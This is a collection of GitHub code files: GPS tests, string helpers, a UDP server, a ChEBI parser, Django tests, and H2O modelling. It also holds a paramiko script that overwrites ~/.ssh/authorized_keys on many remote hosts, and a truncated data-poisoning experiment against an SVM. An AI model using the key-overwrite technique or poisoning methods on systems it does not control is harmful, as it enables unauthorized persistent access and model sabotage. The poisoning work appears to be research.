gprmc_fields = \"225446,A,4916.45,N,12311.12,W,000.5,054.7,191103,020.3\"\n nmea = api.NMEA(\"\", \"\", \"GPRMC\", gprmc_fields.split(\",\"))\n\n # WHEN\n dt = gpstime.parse_gps_datetime(nmea)\n\n # THEN\n assert dt == datetime(2003, 11, 19, 22, 54, 46)\n\n\ndef test_parse_gps_datetime_longtime() -> None:\n gprmc_fields = \"121931.00,A,4801.86153,N,01056.69289,E,53.587,8.64,270520,,,A\"\n nmea = api.NMEA(\"\", \"\", \"GPRMC\", gprmc_fields.split(\",\"))\n\n # WHEN\n dt = gpstime.parse_gps_datetime(nmea)\n\n # THEN\n assert dt == datetime(2020, 5, 27, 12, 19, 31)\n\n\ndef test_parse_gps_datetime_bad_sentence() -> 
None:\n # GIVEN\n gprmc_fields = \"225446,A,4916.45,N,12311.12,W,000.5,054.7,191194,020.3\"\n nmea = api.NMEA(\"\", \"\", \"XXXXX\", gprmc_fields.split(\",\"))\n\n # WHEN\n dt = gpstime.parse_gps_datetime(nmea)\n\n # THEN\n assert dt is None\n\n\ndef test_parse_gps_datetime_notime() -> None:\n # GIVEN\n gprmc_fields = \",,,,,,,,,\"\n nmea = api.NMEA(\"\", \"\", \"GPRMC\", gprmc_fields.split(\",\"))\n\n # WHEN\n dt = gpstime.parse_gps_datetime(nmea)\n\n # THEN\n assert dt is None\n\n\ndef test_set_system_time_tolerable_offset() -> None:\n newtime = datetime(2020, 5, 29, 1, 1, 2)\n now = datetime(2020, 5, 29, 1, 1, 1)\n assert gpstime.set_system_time(newtime, now) is False\n\n\ndef test_set_system_time_now(monkeypatch) -> None:\n # GIVEN\n subpr_mock = mock.Mock()\n monkeypatch.setattr(\"ovshell_core.gpstime.subprocess\", subpr_mock)\n newtime = datetime(2003, 5, 29, 1, 1, 1)\n\n # WHEN, THEN\n assert gpstime.set_system_time(newtime) is True\n subpr_mock.run.assert_called_with(\n [\"date\", \"+%F %H:%M:%S\", \"-s\", \"2003-05-29 01:01:01\"],\n check=True,\n capture_output=True,\n )\n","repo_name":"kedder/openvario-shell","sub_path":"tests/ovshell_core_tests/test_gpstime.py","file_name":"test_gpstime.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"38056294171","text":"\"\"\"\nNaming helpers (e.g. snakecase, kebabcase, ... pluralize, singularize)\n\"\"\"\nimport re\nimport inflection\nfrom kamidana import as_filter\n\npluralize = as_filter(inflection.pluralize)\nsingularize = as_filter(inflection.singularize)\n\n\n@as_filter\ndef snakecase(\n name,\n rx0=re.compile(\"(.)([A-Z][a-z]+)\"),\n rx1=re.compile(\"([a-z0-9])([A-Z])\"),\n rx2=re.compile(\"[A-Z]+\"),\n separator=\"_\",\n from_separator=\"-\",\n):\n if from_separator in name:\n if rx2.search(name) is None:\n return name.replace(from_separator, separator)\n else:\n return separator.join(\n snakecase(x, separator=separator, from_separator=from_separator)\n for x in name.split(from_separator)\n )\n m = rx2.match(name)\n if m is not None:\n i = m.end()\n return separator.join(\n [\n name[:i].lower(),\n snakecase(name[i:], separator=separator, from_separator=from_separator),\n ]\n )\n else:\n pattern = r\"\\1{}\\2\".format(separator)\n return rx1.sub(pattern, rx0.sub(pattern, name)).lower()\n\n\n@as_filter\ndef kebabcase(name):\n return snakecase(name, separator=\"-\", from_separator=\"_\")\n\n\n@as_filter\ndef lispcase(name): # alias\n return snakecase(name, separator=\"-\", from_separator=\"_\")\n\n\n@as_filter\ndef camelcase(name):\n return untitleize(pascalcase(name))\n\n\n@as_filter\ndef pascalcase(name, rx=re.compile(r\"[\\-_ ]\")):\n return \"\".join(titleize(x) for x in rx.split(name))\n\n\n@as_filter\ndef titleize(name):\n if not name:\n return name\n name = str(name)\n return \"{}{}\".format(name[0].upper(), name[1:])\n\n\n@as_filter\ndef untitleize(name):\n if not name:\n return name\n return \"{}{}\".format(name[0].lower(), name[1:])\n","repo_name":"podhmo/kamidana","sub_path":"kamidana/additionals/naming.py","file_name":"naming.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"4309087555","text":"import socket\n\n\nif __name__ == \"__main__\":\n host = \"127.0.0.1\"\n port = 4455\n server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n server.bind((host, port))\n while True:\n data, addr = server.recvfrom(1024)\n 
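# (added comment) datagrams arrive as raw bytes; decode to str before the exit check\n        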
data = data.decode(\"utf-8\")\n if data == \"exit\":\n print(\"Client disconnected.\")\n break\n key,addr = server.recvfrom(1024)\n key = key.decode(\"utf-8\")\n print(data)\n print(key)\n \n\n \n data = data.encode(\"utf-8\")\n server.sendto(data, addr)\n \n server.close()","repo_name":"rahulkumarroy477/socket-programming","sub_path":"udp/crc_server.py","file_name":"crc_server.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72002708900","text":"# 589. N-ary Tree Preorder Traversal\n\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def preorder(self, root: 'Node') -> List[int]:\n values = []\n def dfs(root: 'Node'):\n nonlocal values\n if root:\n values.append(root.val)\n if root.children != []:\n for child in root.children:\n dfs(child)\n \n dfs(root)\n \n return values","repo_name":"YukiT1990/Leetcode","sub_path":"00204_N-aryTreePreorderTraversal(589).py","file_name":"00204_N-aryTreePreorderTraversal(589).py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36496632169","text":"from __future__ import print_function\nfrom builtins import str\nfrom builtins import object\nimport pdb\nimport socket\nimport xml.dom.minidom\n\nimport metmask.query as query\nfrom metmask.mask import mask\n\nsocket.setdefaulttimeout(5)\n\n\nclass chebiParser(object):\n def __init__(self, parent):\n self.getComplete = 'http://www.ebi.ac.uk/webservices/chebi/test/getCompleteEntity?'\n self.getLite = 'http://www.ebi.ac.uk/webservices/chebi/test/getLiteEntity?'\n self.getOntologyChildren = 'http://www.ebi.ac.uk/webservices/chebi/test/getOntologyChildren?'\n self.queryTables = ['chebi', 'iupac', 'cas', 'kegg', 'inchi', 'smiles', 'formula', 'synonym']\n self.parent = parent\n\n def url2ids(self, url):\n \"\"\"\n take an url, get the chebi ids\n \"\"\"\n qRes = self.parent.getUrl(url)\n if qRes:\n searchResults = xml.dom.minidom.parse(qRes)\n ids = list(query.nodecontents(searchResults.getElementsByTagName('ns1:chebiId')))\n return [x.replace('CHEBI:', '') for x in ids]\n else:\n return []\n\n def getChebiChildren(self, chebiId):\n \"\"\" get the is_enantiomer children \n \"\"\"\n url = self.getOntologyChildren + \"chebiId=\" + chebiId\n qRes = self.parent.getUrl(url)\n if not qRes:\n return ([])\n searchResults = xml.dom.minidom.parse(qRes)\n res = []\n for it in searchResults.getElementsByTagName('ns1:ListElement'):\n type = list(query.nodecontents(it.getElementsByTagName(\"ns1:type\")))\n if type[0] == 'is enantiomer of':\n child = list(query.nodecontents(it.getElementsByTagName(\"ns1:chebiId\")))\n res.append(child[0].replace(\"CHEBI:\", \"\"))\n return (res)\n\n def getChebiMasks(self, un, mm):\n \"\"\"\n 1. use getLite to query for all relevant entries in the mask\n 2. Query for chebi, iupac, cas, kegg, inchi, smiles\n 1. Get only exact matches\n 3. Take the unique ones\n 4. 
Get all is_a children of the found chebis and add them\n Result is a list of masks\n \"\"\"\n res = {}\n # pdb.set_trace()\n tmpmask = mask({}, mm.idpatterns)\n if not any([x in self.queryTables for x in un.getTables()]):\n return (res)\n if un.hasTable('chebi'):\n for ch in un.getIdentifiers('chebi'):\n res[ch] = self.chebi2mask(mm, ch)\n tmpmask.merge(res[ch])\n\n def filteredids(table, un, tmpmask):\n identifiers = []\n if un.hasTable(table):\n identifiers = un.getIdentifiers(table)\n if tmpmask.hasTable(table):\n # to start querying for the same identifiers several times\n identifiers = [x for x in identifiers if x not in tmpmask.getIdentifiers(table)]\n return (identifiers)\n\n def fillresandmerge(qUrl, tmpmask, res):\n newids = self.url2ids(qUrl)\n for ch in newids:\n if ch not in res:\n res[ch] = self.chebi2mask(mm, ch)\n tmpmask.merge(res[ch])\n\n for ide in filteredids('iupac', un, tmpmask):\n qUrl = self.getLite + \"search=\" + \\\n self.parent.urlSafe(ide) + \"&searchCategory=IUPAC+NAME\"\n fillresandmerge(qUrl, tmpmask, res)\n\n for ide in filteredids('cas', un, tmpmask):\n qUrl = self.getLite + \"search=\" + \\\n self.parent.urlSafe(ide) + \"&searchCategory=REGISTRY+NUMBER\"\n fillresandmerge(qUrl, tmpmask, res)\n\n for ide in filteredids('kegg', un, tmpmask):\n qUrl = self.getLite + \"search=\" + \\\n self.parent.urlSafe(ide) + \"&searchCategory=DATABASE+LINK\"\n fillresandmerge(qUrl, tmpmask, res)\n\n for ide in filteredids('inchi', un, tmpmask):\n qUrl = self.getLite + \"search=\" + \\\n self.parent.urlSafe(ide) + \"&searchCategory=INCHI\"\n fillresandmerge(qUrl, tmpmask, res)\n\n for ide in filteredids('smiles', un, tmpmask):\n qUrl = self.getLite + \"search=\" + \\\n self.parent.urlSafe(ide) + \"&searchCategory=SMILES\"\n fillresandmerge(qUrl, tmpmask, res)\n\n foundIds = list(res.keys())\n children = []\n for ch in foundIds:\n children = self.getChebiChildren(ch)\n for child in children:\n if child not in res:\n res[child] = self.chebi2mask(mm, child)\n return (res)\n\n def chebi2mask(self, mm, chebiId):\n \"\"\"\n get a mask containing the info associated with a chebi id\n 2. use getComplete to fetch the contents of the relevant entries\n \"\"\"\n ba = chebiId\n un = mask({}, mm.idpatterns)\n qUrl = self.getComplete + \"chebiId=\" + str(chebiId)\n qRes = self.parent.getUrl(qUrl)\n if not qRes:\n return (mask({}))\n searchResults = xml.dom.minidom.parse(qRes)\n if not searchResults:\n return (mask({}))\n if searchResults.getElementsByTagName('ns1:return'):\n retList = searchResults.getElementsByTagName('ns1:return')[0]\n # found non-existent chebiId\n else:\n # this would have been reasonable but chebi has problems so that some\n # entries exist, but cant be fetched. 
valid chebi but we cant query\n # for it,\n # hence, skip completely\n # delmask = mask({})\n # delmask.append('chebi', chebiId)\n # mm.brandish(delmask)\n return (mask({}))\n # chebiid\n if retList.getElementsByTagName(\"ns1:chebiId\"):\n chebiId = list(query.nodecontents(retList.getElementsByTagName(\"ns1:chebiId\")))[0]\n un.append('chebi', chebiId.replace(\"CHEBI:\", \"\"),\n self.parent.confid, self.parent.sourceid)\n\n # smiles\n if retList.getElementsByTagName(\"ns1:smiles\"):\n un.append('smiles', list(query.nodecontents(retList.getElementsByTagName(\"ns1:smiles\")))[0],\n self.parent.confid, self.parent.sourceid)\n\n # synonym\n if searchResults.getElementsByTagName('ns1:Synonyms'):\n syns = searchResults.getElementsByTagName('ns1:Synonyms')[0]\n for sy in list(query.nodecontents(syns.getElementsByTagName(\"ns1:data\"))):\n un.append('synonym', sy, self.parent.mm.confidence['weak'], \\\n self.parent.sourceid)\n\n # inchi\n if retList.getElementsByTagName(\"ns1:inchi\"):\n un.append('inchi', list(query.nodecontents(retList.getElementsByTagName(\"ns1:inchi\")))[0],\n self.parent.confid, self.parent.sourceid)\n\n # iupac\n if searchResults.getElementsByTagName('ns1:IupacNames'):\n syns = searchResults.getElementsByTagName('ns1:IupacNames')[0]\n for sy in list(query.nodecontents(syns.getElementsByTagName(\"ns1:data\"))):\n un.append('iupac', sy, self.parent.confid, \\\n self.parent.sourceid)\n\n # kegg\n for ll in searchResults.getElementsByTagName('ns1:DatabaseLinks'):\n if list(query.nodecontents(ll.getElementsByTagName(\"ns1:type\")))[0] == 'KEGG COMPOUND accession':\n for sy in list(query.nodecontents(ll.getElementsByTagName(\"ns1:data\"))):\n un.append('kegg', sy, self.parent.confid, self.parent.sourceid)\n\n # cas\n for ll in searchResults.getElementsByTagName('ns1:RegistryNumbers'):\n if list(query.nodecontents(ll.getElementsByTagName(\"ns1:type\")))[0] == 'CAS Registry Number':\n for sy in list(query.nodecontents(ll.getElementsByTagName(\"ns1:data\"))):\n un.append('cas', sy, self.parent.confid, self.parent.sourceid)\n\n # pdb.set_trace()\n # formula\n if searchResults.getElementsByTagName('ns1:Formulae'):\n form = searchResults.getElementsByTagName('ns1:Formulae')[0]\n for sy in list(query.nodecontents(form.getElementsByTagName(\"ns1:data\"))):\n un.append('formula', sy, self.parent.mm.confidence['weak'], \\\n self.parent.sourceid)\n\n return (un)\n\n\nclass parser(object):\n def __init__(self, parent):\n self.chebip = chebiParser(parent)\n parent.tables = self.chebip.queryTables\n self.parent = parent\n if not parent.boost:\n parent.boost = True\n parent.master = 'chebi'\n\n def process(self):\n ll = True\n self.parent.mm.setTableWeak('formula')\n\n while ll:\n ll = self.parent.getLine()\n if not ll:\n break\n tmp = mask({})\n tmp.append('_id', ll)\n tmp2 = self.parent.mm.getMask(tmp)\n if not tmp2:\n continue\n else:\n un = tmp2[0]\n try:\n chebiMasks = self.chebip.getChebiMasks(un, self.parent.mm)\n except:\n pdb.set_trace()\n if self.parent.mm.debug:\n print(\"#COMMENT mask \" + str(ll) + \" chebi \" + str(list(chebiMasks.keys())))\n chMask = mask({})\n for ch in list(chebiMasks.keys()):\n chebiMasks[ch].setAllAssoc(self.parent.mm.addAss())\n chMask.merge(chebiMasks[ch])\n self.parent.setMask(chMask, setass=False)\n","repo_name":"hredestig/metmask","sub_path":"metmask/parse/_chebi.py","file_name":"_chebi.py","file_ext":"py","file_size_in_byte":9487,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} 
+{"seq_id":"41583962859","text":"import csv\nimport paramiko\n# key_fname should be your SSH private key\nkey_fname='assignmentKeyPair.pem'\n# hostnames.txt lists the hostname and the IP address of each machine,\n# one machine per line, whitespace-separated: hostname ip\nwith open(\"hostnames.txt\") as f:\n    for line in f:\n        arr=line.split()\n        uname=arr[0]\n        ip=arr[1]\n        ssh = paramiko.SSHClient()\n        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n        ssh.connect(ip, username=uname, key_filename=key_fname)\n        stdin, stdout, stderr = ssh.exec_command('hostname')\n        hostname=stdout.readlines()[0].rstrip()\n        print(hostname)\n        stdin, stdout, stderr = ssh.exec_command('stat --format=mtime=%y\\|ctime=%z\\|atime=%x ~/.ssh/authorized_keys')\n        stats = stdout.readlines()[0].rstrip()\n        print(stats)\n        sftp = ssh.open_sftp()\n        path='/home/'+uname+'/.ssh/authorized_keys'\n        # newkey.pub is the replacement SSH authorized_keys file\n        sftp.put('newkey.pub',path)\n        stdin, stdout, stderr = ssh.exec_command('cat '+path)\n        content = stdout.readlines()[0].rstrip()\n        # output is generated in the output.csv file\n        with open('output.csv','a') as f1:\n            writer=csv.writer(f1)\n            writer.writerow([hostname,ip,stats,content])","repo_name":"ashishmalpani706/sysops","sub_path":"runSSH.py","file_name":"runSSH.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"23972003019","text":"import sys\nimport yaml\nfrom pathlib import Path\n\nfrom numpy import in1d, where\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_svmlight_file, dump_svmlight_file\n\n\ndef execute(X, y, qid, test_size):\n    unique_qids = list(set(qid))\n    train_qids, test_qids = train_test_split(unique_qids, test_size=test_size)\n\n    mask = in1d(qid, train_qids)\n    train_indexes = where(mask)[0]\n    test_indexes = where(~mask)[0]\n\n    X_train = X[train_indexes]\n    y_train = y[train_indexes]\n    qid_train = qid[train_indexes]\n\n    X_test = X[test_indexes]\n    y_test = y[test_indexes]\n    qid_test = qid[test_indexes]\n\n    dataset_path = f\"database/dataset\"\n\n    Path(dataset_path).mkdir(parents=True, exist_ok=True)\n\n    dump_svmlight_file(X=X_train, y=y_train, query_id=qid_train, f=f'{dataset_path}/train.txt')\n    dump_svmlight_file(X=X_test, y=y_test, query_id=qid_test, 
f=f'{dataset_path}/test.txt')\n\n\nif __name__ == '__main__':\n dataset_path = sys.argv[1]\n test_size = yaml.safe_load(open('params.yaml'))['data_splitting']['test_size']\n X, y, qid = load_svmlight_file(dataset_path, query_id=True)\n execute(X=X, y=y, qid=qid, test_size=test_size)","repo_name":"arthurbv2/cin_data_science_ml_eng_class","sub_path":"dvc_demo/nodes/train_test_split_node.py","file_name":"train_test_split_node.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73069755941","text":"from rest_framework.test import APITestCase, APIRequestFactory, force_authenticate\nfrom users.models import User\nfrom django.urls import reverse\nfrom rest_framework import status\n\nfrom .models import User\nfrom .views import UserListView, UserDetailsView\n\n\nclass UserTests(APITestCase):\n\n @classmethod\n def setUp(cls):\n cls.testuser = User.objects.create_user(\n username='testuser',\n password='testpassword')\n\n cls.testadmin = User.objects.create_superuser(\n username='admin',\n email='admin@admin.com',\n password='testadminpassword')\n\n cls.testuser.save()\n cls.testadmin.save()\n cls.factory = APIRequestFactory()\n\n def test_user_details(self):\n \"\"\"\n Test user details view.\n Existing user credentials are used to authenticate the request.\n \"\"\"\n url = reverse(\"users:user-details\", args=[self.testuser.pk])\n request = self.factory.get(url)\n force_authenticate(request, user=self.testuser)\n response = UserDetailsView.as_view()(request, pk=self.testuser.pk)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_user_details_unauthenticated(self):\n \"\"\"\n Test user details view.\n No authentication is performed.\n \"\"\"\n url = reverse(\"users:user-details\", args=[self.testuser.pk])\n request = self.factory.get(url)\n response = UserDetailsView.as_view()(request, pk=self.testuser.pk)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n def test_user_list_as_superuser(self):\n \"\"\"\n Test users list view.\n Existing superuser credentials are used to authenticate the request.\n \"\"\"\n request = self.factory.get('/api/users/')\n force_authenticate(request, user=self.testadmin)\n response = UserListView.as_view()(request)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_user_list_as_user(self):\n \"\"\"\n Test user list view.\n Existing user credentials are used, but they should be insufficient.\n \"\"\"\n request = self.factory.get('/api/users/')\n force_authenticate(request, user=self.testuser)\n response = UserListView.as_view()(request)\n\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_user_list_unauthenticated(self):\n \"\"\"\n Test user list view.\n No authentication is performed.\n \"\"\"\n request = self.factory.get('/api/users/')\n response = UserListView.as_view()(request)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n def test_get_current_user_authenticated(self):\n \"\"\"\n Test getting current user data.\n Authentication is provided\n \"\"\"\n request = self.factory.get('/api/users/whoami')\n force_authenticate(request, user=self.testuser)\n response = UserDetailsView.as_view()(request, pk=self.testuser.pk)\n\n # compare if response matches with user data\n for key, value in response.data.items():\n self.assertEqual(value, vars(request.user)[key])\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def 
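The test-suite record above repeatedly applies one DRF pattern: build a request with `APIRequestFactory`, attach a user in-process with `force_authenticate`, and invoke the view callable directly. A hedged sketch of that pattern follows; it assumes a configured Django/DRF project (settings, database), and the `PingView` view is illustrative, not part of the app under test.

```python
# Pattern sketch: factory request -> force_authenticate -> call view directly.
from django.contrib.auth import get_user_model
from rest_framework import status
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.test import APIRequestFactory, APITestCase, force_authenticate
from rest_framework.views import APIView

class PingView(APIView):  # illustrative view for the sketch only
    permission_classes = [IsAuthenticated]

    def get(self, request):
        return Response({"user": request.user.username})

class PingTests(APITestCase):
    def test_authenticated_ok(self):
        user = get_user_model().objects.create_user("alice", password="x")
        request = APIRequestFactory().get("/ping/")
        force_authenticate(request, user=user)
        response = PingView.as_view()(request)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_unauthenticated_rejected(self):
        request = APIRequestFactory().get("/ping/")
        response = PingView.as_view()(request)
        # DRF returns 401 or 403 depending on the configured authentication classes.
        self.assertIn(response.status_code,
                      (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
```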
test_get_current_user_unauthenticated(self):\n \"\"\"\n Test getting current user data.\n Authentication is not provided\n \"\"\"\n request = self.factory.get('/api/users/current')\n response = UserDetailsView.as_view()(request, pk=None)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n","repo_name":"nokia-wroclaw/innovativeproject-inventory-of-supplies","sub_path":"backend/users/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11958129458","text":"import h2o\r\nimport numpy as np\r\nh2o.init()\r\n\r\ndf = h2o.import_file(\"F:/Kaggle/Santander Customer/train.csv\")\r\ndf.col_names\r\n\r\ndf_test = h2o.import_file(\"F:/Kaggle/Santander Customer/test.csv\")\r\ndf_test.col_names\r\n\r\ny_col = 'TARGET'\r\nx_cols = df.col_names\r\nx_cols.remove(y_col)\r\nx_cols.remove('ID')\r\nprint(\"Response = \" + y_col)\r\nprint(\"Pridictors = \" + str(x_cols))\r\n\r\ndf['TARGET'] = df['TARGET'].asfactor()\r\ndf['TARGET'].levels()\r\n\r\ntrain, test = df.split_frame(ratios=[.8],seed=2021)\r\n\r\n######################## Grid Search ############################################\r\n\r\nfrom h2o.grid.grid_search import H2OGridSearch\r\nhyper_parameters = {'mtries': list(np.arange(10,60,10))}\r\nmodel_rf = H2ORandomForestEstimator(seed=2021)\r\ngs = H2OGridSearch(model=model_rf,hyper_params=hyper_parameters)\r\ngs.train(x=x_cols, y=y_col, training_frame=train, \r\n validation_frame=test, \r\n model_id=\"model_rf_tune\")\r\nmodels = gs.get_grid(sort_by='auc', decreasing=True)\r\nbest_model = models.models[0]\r\nbest_params = best_model.actual_params\r\nbest_params\r\nbest_model_perf1 = best_model.model_performance(test)\r\nbest_model_perf1.auc()\r\n\r\n######################################################################################\r\n\r\ny_pred = best_model.predict(test_data=df_test)\r\npreds = y_pred.as_data_frame()\r\nTestID = df_test[\"ID\"]\r\nID = TestID.as_data_frame()\r\nID = ID['ID']\r\nTARGET = preds['p1']\r\nimport pandas as pd\r\nsubmit = pd.DataFrame({'ID':ID, 'TARGET':TARGET})\r\n\r\nsubmit.to_csv(\"F:/Kaggle/Santander Customer/submit_h2o_rf.csv\",\r\n index=False)\r\n\r\n\r\n","repo_name":"oliabhi/Machine-Learning","sub_path":"Codes/santan_h2o_rf_grid.py","file_name":"santan_h2o_rf_grid.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42572691278","text":"\n\n# sci-kit learn libraries\nimport sklearn\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nfrom sklearn.datasets import make_classification\nfrom sklearn.metrics import hinge_loss\n\n# dataset and ml libraries\nfrom keras.datasets import cifar10\nimport torch\nimport tensorflow\nimport onnx\n\nimport numpy as np\n\n# plotting libraries\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# miscellaneous\nimport time\nimport random\nimport sys\nfrom pdb import set_trace\n\n# Set seeds for poison / camou / target selection here:\nrandom.seed(222222)\n\n# Class Dictionary for CIFAR10\nclassDict = {'plane': 0, 'car': 1, 'bird': 2, 'cat': 3, 'deer': 4,\n 'dog': 5, 'frog': 6, 'horse': 7, 'ship': 8, 'truck': 9}\n\nbinaryClasses = {0:'Machine', 1:'Animal'} # Machine , Animal\n\n# Method to obtain camouflages: use \"BREW\" for Gradient matching or \"FLIP\" by label flipping\nCAMO = 'BREW'\n\n(x_train, y_train_label), (x_test, y_test_label) = 
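The H2O grid-search record above instantiates `H2ORandomForestEstimator` without ever importing it, so the script raises `NameError` as written; the estimator lives in `h2o.estimators.random_forest`. A corrected setup sketch, keeping the original hyperparameter grid (the `train()` call is elided since it needs the script's frames):

```python
# Corrected imports for the grid-search snippet above.
import numpy as np
import h2o
from h2o.estimators.random_forest import H2ORandomForestEstimator  # missing in the original
from h2o.grid.grid_search import H2OGridSearch

h2o.init()
hyper_parameters = {"mtries": list(np.arange(10, 60, 10))}
model_rf = H2ORandomForestEstimator(seed=2021)
gs = H2OGridSearch(model=model_rf, hyper_params=hyper_parameters)
# gs.train(x=x_cols, y=y_col, training_frame=train, validation_frame=test)
```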
cifar10.load_data()\n\ndef rgb_to_gray(images):\n return np.dot(images[...,:3], [0.2989, 0.5870, 0.1140])\n\n# Convert RGB to grayscale\nx_train = rgb_to_gray(x_train)\nx_test = rgb_to_gray(x_test)\n\n# Expand dimensions for grayscale channel (making it 32x32x1)\nx_train = np.expand_dims(x_train, axis=-1)\nx_test = np.expand_dims(x_test, axis=-1)\n\n# Normalize pixel values and dividing each image by its Frobenius norm\nx_train = x_train / 255.0\nx_test = x_test / 255.0\nm_train, m_test = x_train.shape[0], x_test.shape[0]\n\nx_train_flat = x_train.reshape(m_train, -1)\nx_test_flat = x_test.reshape(m_test, -1)\nx_train_norm = np.linalg.norm(x_train_flat, ord=2, axis=1, keepdims=True)\nx_test_norm = np.linalg.norm(x_test_flat, ord=2, axis=1, keepdims=True)\n\nx_train_flat = x_train_flat / x_train_norm\nx_test_flat = x_test_flat / x_test_norm\n\n# Flatten labels\ny_train_label = y_train_label.ravel()\ny_test_label = y_test_label.ravel()\nanimal_indices = []\nmachine_indices = []\n\ny_train = np.array([False] * m_train)\ny_test = np.array([False] * m_test)\n\n# Convert to Binary dataset\nfor i in range(m_test):\n if y_test_label[i] in [2,3,4,5,6,7]:\n y_test[i] = True\n else:\n y_test[i] = False\n\nfor i in range(m_train):\n if y_train_label[i] in [2,3,4,5,6,7]:\n y_train[i] = True\n animal_indices.append(i)\n else:\n y_train[i] = False\n machine_indices.append(i)\n\nstart_time = time.time()\n\n#model_SVC = SVC(kernel = 'linear', max_iter=100, probability=True)\nclean_model = LinearSVC(loss='hinge', max_iter=3000)\n#fit\nclean_model.fit(x_train_flat, y_train)\n\nprint(\"Elapsed[s] : \", time.time() - start_time)\n\ndef show_image(img, norm = None):\n if norm:\n #To show Image:\n target = img * norm\n plt.imshow(target.reshape(32, 32, 1))\n plt.show()\n else:\n plt.imshow(img.reshape(32, 32, 1))\n plt.show()\n\nclose_pos = []\n\n# Run model on Test set\n\ndecision_function_test = clean_model.decision_function(x_test_flat)\n\n# Find all support vectors of the model\nclose_positives = np.where((decision_function_test <= 0.1) & (decision_function_test > 0))[0]\nprint(close_positives)\n\n# Making sure the target is chosen from animals but prediction is machine\n# score > 0: Machine as Class 0\n# score < 0: Animal as Class 1\nfor ind in close_positives:\n if y_test[ind] == 1:\n close_pos.append(ind)\n\ntarget_indice = random.choices(close_pos)\n\nprint('target_indice:', target_indice)\ntarget_label = 0\ntarget = x_test_flat[target_indice[0]].reshape(1, -1)\ntarget_original_label = y_test[target_indice[0]]\n\n#To show Target Image:\nplt.imshow(target.reshape(32, 32, 1) * x_test_norm[target_indice[0]])\nprint(\"Target chosen from class:\", binaryClasses[target_original_label])\nprint(\"Target assigned to class:\", binaryClasses[target_label])\n\n# Deleting Target from orignal test set.\nx_test = np.delete(x_test_flat, target_indice[0], 0)\ntarget_original_label = y_test[target_indice[0]]\ny_test = np.delete(y_test, target_indice[0], 0)\n\n# check if notebook is in colab\ntry:\n # install ezkl\n import google.colab\n import subprocess\n #import sys\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"ezkl\"])\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"onnx\"])\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"sk2torch\"])\n\n# rely on local installation of ezkl if the notebook is not in colab\nexcept:\n pass\n\n\n# here we create and (potentially train a model)\n\n# make sure you have the dependencies required here already 
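The target-selection logic in this record uses the sign and magnitude of `decision_function` to find test points sitting just inside the positive margin of a linear SVM. A self-contained sketch of that idea on synthetic data (thresholds mirror the 0 < score <= 0.1 window used above; the dataset is illustrative):

```python
# Pick samples whose signed distance to the LinearSVC hyperplane is small but positive.
import numpy as np
from sklearn.datasets import make_classification
from sklearn.svm import LinearSVC

X, y = make_classification(n_samples=500, n_features=20, random_state=0)
clf = LinearSVC(loss="hinge", max_iter=3000).fit(X, y)

scores = clf.decision_function(X)
near_boundary = np.where((scores > 0) & (scores <= 0.1))[0]
print(len(near_boundary), "samples sit just inside the positive margin")
```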
installed\nimport json\n#import numpy as np\nfrom sklearn.svm import SVC\nimport sk2torch\n#import torch\nimport ezkl\nimport os\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# check if notebook is in colab\ntry:\n import sys\n\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"solc-select\"])\n # 执行其他 shell 命令\n subprocess.run([\"solc-select\", \"install\", \"0.8.20\"], check=True)\n subprocess.run([\"solc-select\", \"use\", \"0.8.20\"], check=True)\n subprocess.run([\"solc\", \"--version\"], check=True)\n\n# rely on local installation if the notebook is not in colab\nexcept:\n pass\n\nmodel_path = os.path.join('network.onnx')\ncompiled_model_path = os.path.join('network.compiled')\npk_path = os.path.join('test.pk')\nvk_path = os.path.join('test.vk')\nsettings_path = os.path.join('settings.json')\nsrs_path = os.path.join('kzg.srs')\nwitness_path = os.path.join('witness.json')\ndata_path = os.path.join('input.json')\nproof_path = os.path.join('proof.json')\n\naggregate_proof_path = os.path.join('aggr.pf')\naggregate_vk_path = os.path.join('aggr.vk')\naggregate_pk_path = os.path.join('aggr.pk')\n\nasync def 